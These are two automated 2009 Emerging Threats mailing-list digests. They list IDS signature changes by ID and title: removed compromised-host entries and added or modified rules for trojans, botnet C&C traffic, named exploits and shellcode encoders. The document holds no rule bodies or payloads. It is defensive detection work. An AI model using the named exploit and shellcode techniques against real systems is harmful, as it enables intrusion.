From emerging at emergingthreats.net Sat Aug 1 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 1 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090801200012.B38DA4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Aug 1 16:00:12 2009 [***]

[*] Rules modifications: [*]
    None.

[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (64):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

    -> Removed from emerging-sid-msg.map.txt (64):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat Aug 1 18:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 1 Aug 2009 18:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090801220011.8C9704504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Aug 1 18:00:11 2009 [***]

[+++] Added rules: [+++]

    2009694 - ET TROJAN Navipromo related update (emerging-virus.rules)
    2009695 - ET CURRENT_EVENTS ISC BIND9 Update DoS (emerging.rules)
    2009696 - ET POLICY External Connection to Altiris HelpDesk (emerging-policy.rules)
    2009697 - ET POLICY External Connection to Altiris Console (emerging-policy.rules)
    2009698 - ET VOIP INVITE Message Flood UDP (emerging-voip.rules)
    2009699 - ET VOIP REGISTER Message Flood UDP (emerging-voip.rules)
    2009700 - ET VOIP Multiple Unauthorized SIP Responses UDP (emerging-voip.rules)
    2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules)
    2009702 - ET CURRENT_EVENTS POLICY DNS Update From External net (emerging.rules)
    2009703 - ET MALWARE Suspicious User-Agent (INet) (emerging-malware.rules)

[+++] Enabled and modified rules: [+++]

    2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules)
    2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules)

[///] Modified active rules: [///]

    2001406 - ET POLICY Possible hidden zip extension .cpl (emerging-policy.rules)
    2001407 - ET POLICY Possible hidden zip extension .pif (emerging-policy.rules)
    2001408 - ET POLICY Possible hidden zip extension .scr (emerging-policy.rules)
    2002903 - ET EXPLOIT x86 PexFnstenvMov/Sub Encoder (emerging-exploit.rules)
    2002904 - ET EXPLOIT x86 Alpha2 GetEIPs Encoder (emerging-exploit.rules)
    2002905 - ET EXPLOIT x86 Countdown Encoder (emerging-exploit.rules)
    2002906 - ET EXPLOIT x86 PexAlphaNum Encoder (emerging-exploit.rules)
    2002907 - ET EXPLOIT x86 PexCall Encoder (emerging-exploit.rules)
    2002908 - ET EXPLOIT x86 JmpCallAdditive Encoder (emerging-exploit.rules)
    2003192 - ET VOIP INVITE Message Flood TCP (emerging-voip.rules)
    2003193 - ET VOIP REGISTER Message Flood TCP (emerging-voip.rules)
    2003194 - ET VOIP Multiple Unauthorized SIP Responses TCP (emerging-voip.rules)
    2006910 - ET TROJAN perlb0t/w0rmb0t Response (Case 1) (emerging-virus.rules)
    2006911 - ET TROJAN perlb0t/w0rmb0t Response (Case 2) (emerging-virus.rules)
    2006912 - ET TROJAN perlb0t/w0rmb0t Response (Case 3) (emerging-virus.rules)
    2007622 - ET TROJAN Kaiten IRCbotnet Response (emerging-virus.rules)
    2007623 - ET TROJAN Kaiten IRCbotnet Commands (emerging-virus.rules)
    2007624 - ET TROJAN Pitbull IRCbotnet Response (emerging-virus.rules)
    2007851 - ET EXPLOIT Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit (emerging-exploit.rules)
    2008776 - ET EXPLOIT GuildFTPd CWD and LIST Command Heap Overflow - POC-1 (emerging-exploit.rules)
    2008777 - ET EXPLOIT GuildFTPd CWD and LIST Command Heap Overflow - POC-2 (emerging-exploit.rules)
    2009246 - ET ATTACK_RESPONSE Bindshell2 Decoder Shellcode (emerging-attack_response.rules)
    2009247 - ET ATTACK_RESPONSE Rothenburg Shellcode (emerging-attack_response.rules)
    2009248 - ET ATTACK_RESPONSE Lindau (linkbot) xor Decoder Shellcode (emerging-attack_response.rules)
    2009249 - ET ATTACK_RESPONSE Adenau Shellcode (emerging-attack_response.rules)
    2009250 - ET ATTACK_RESPONSE Mainz/Bielefeld Shellcode (emerging-attack_response.rules)
    2009251 - ET ATTACK_RESPONSE Wuerzburg Shellcode (emerging-attack_response.rules)
    2009252 - ET ATTACK_RESPONSE Schauenburg Shellcode (emerging-attack_response.rules)
    2009253 - ET ATTACK_RESPONSE Koeln Shellcode (emerging-attack_response.rules)
    2009254 - ET ATTACK_RESPONSE Lichtenfels Shellcode (emerging-attack_response.rules)
    2009255 - ET ATTACK_RESPONSE Mannheim Shellcode (emerging-attack_response.rules)
    2009256 - ET ATTACK_RESPONSE Berlin Shellcode (emerging-attack_response.rules)
    2009257 - ET ATTACK_RESPONSE Leimbach Shellcode (emerging-attack_response.rules)
    2009258 - ET ATTACK_RESPONSE Aachen Shellcode (emerging-attack_response.rules)
    2009259 - ET ATTACK_RESPONSE Furth Shellcode (emerging-attack_response.rules)
    2009260 - ET ATTACK_RESPONSE Langenfeld Shellcode (emerging-attack_response.rules)
    2009261 - ET ATTACK_RESPONSE Bonn Shellcode (emerging-attack_response.rules)
    2009262 - ET ATTACK_RESPONSE Siegburg Shellcode (emerging-attack_response.rules)
    2009263 - ET ATTACK_RESPONSE Plain1 Shellcode (emerging-attack_response.rules)
    2009264 - ET ATTACK_RESPONSE Plain2 Shellcode (emerging-attack_response.rules)
    2009265 - ET ATTACK_RESPONSE Bindshell1 Decoder Shellcode (emerging-attack_response.rules)
    2009286 - ET SCAN Modbus Scanning detected (emerging-scan.rules)
    2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)
    2009679 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 1 (emerging-web_sql_injection.rules)
    2009680 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 2 (emerging-web_sql_injection.rules)
    2009683 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 5 (emerging-web_sql_injection.rules)
    2009684 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 6 (emerging-web_sql_injection.rules)
    2009685 - ET TROJAN Unkown Trojan User-Agent (5.1 ...) (emerging-virus.rules)
    2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
    2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
    2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
    2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
    2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
    2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
    2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
    2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
    2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
    2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
    2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
    2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
    2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
    2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
    2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
    2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
    2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
    2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
    2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
    2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
    2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
    2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
    2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
    2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules)
    2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules)
    2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules)
    2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules)
    2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
